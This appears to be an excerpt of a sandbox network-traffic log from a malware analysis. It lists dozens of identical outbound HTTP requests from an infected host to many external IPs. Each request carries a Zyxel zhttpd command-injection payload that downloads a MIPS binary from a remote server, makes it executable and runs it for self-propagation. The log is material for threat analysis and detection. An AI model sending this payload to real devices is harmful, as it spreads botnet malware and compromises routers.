                                                Jan 12, 2024 18:24:47.139157057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7246192.168.2.1347614176.251.99.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139209032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7247192.168.2.1345032164.208.205.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139262915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7248192.168.2.1347318166.100.151.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139318943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7249192.168.2.135822668.21.221.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139353991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7250192.168.2.1359346191.235.184.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139422894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7251192.168.2.134439273.109.88.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139482975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7252192.168.2.1343768175.242.173.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139544964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7253192.168.2.135503882.192.249.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139594078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7254192.168.2.1354954202.61.68.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139650106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7255192.168.2.134636846.63.166.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139703035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7256192.168.2.1350012196.164.87.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139745951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7257192.168.2.134355817.62.105.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139791012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7258192.168.2.1335704139.250.151.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139851093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7259192.168.2.134038639.38.95.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139904022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7260192.168.2.133762282.123.174.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139971018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7261192.168.2.134086044.136.76.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140029907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7262192.168.2.133722027.146.30.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140078068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7263192.168.2.1357966144.215.32.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140131950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7264192.168.2.1351656108.123.15.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140191078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7265192.168.2.1341308102.167.97.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140244961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7266192.168.2.1351332191.255.183.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140295029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7267192.168.2.1336284172.184.66.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140333891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7268192.168.2.1333276211.53.238.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140393019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7269192.168.2.135211438.236.37.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140450001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7270192.168.2.135488668.34.39.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140496969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7271192.168.2.134351854.106.32.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140552044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7272192.168.2.135230461.16.77.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140675068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7273192.168.2.134502485.99.126.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140727043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7274192.168.2.134695223.180.173.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140789032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7275192.168.2.1344910130.78.182.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140850067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7276192.168.2.134616274.231.15.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140903950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7277192.168.2.1334406194.129.137.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.140973091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7278192.168.2.134480662.81.165.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141004086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7279192.168.2.133391478.37.34.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141050100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7280192.168.2.133740697.141.52.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141107082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7281192.168.2.1334404132.248.74.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141145945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7282192.168.2.1343264210.19.200.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141222000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7283192.168.2.1341424110.14.128.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141268969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7284192.168.2.133331697.198.250.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141333103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7285192.168.2.1340846151.241.136.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141382933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7286192.168.2.1335978174.235.99.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141427040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7287192.168.2.134596820.197.169.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141486883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7288192.168.2.134978825.75.232.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141535044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7289192.168.2.1337916220.65.120.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141612053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7290192.168.2.133314623.87.192.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141664982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7291192.168.2.1352406177.19.140.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141717911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7292192.168.2.134544840.238.240.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141757965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7293192.168.2.1356082184.159.219.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141807079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7294192.168.2.1342128147.55.234.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141872883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7295192.168.2.1350546112.120.129.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141899109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7296192.168.2.135544620.211.7.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.141977072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7297192.168.2.1333894184.46.96.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142035961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7298192.168.2.133523224.139.250.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142066956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7299192.168.2.1347556205.177.229.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142126083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7300192.168.2.135935212.173.104.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142187119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7301192.168.2.1356356162.171.104.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142220020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7302192.168.2.1355706213.213.6.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142302990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7303192.168.2.1339986213.206.193.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142357111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7304192.168.2.1342864142.101.231.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142433882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7305192.168.2.134348867.71.210.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142468929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7306192.168.2.1353748132.149.252.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142507076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7307192.168.2.133403490.214.252.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.142577887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7308192.168.2.1351698123.246.139.68443
                                                TimestampBytes transferredDirectionData
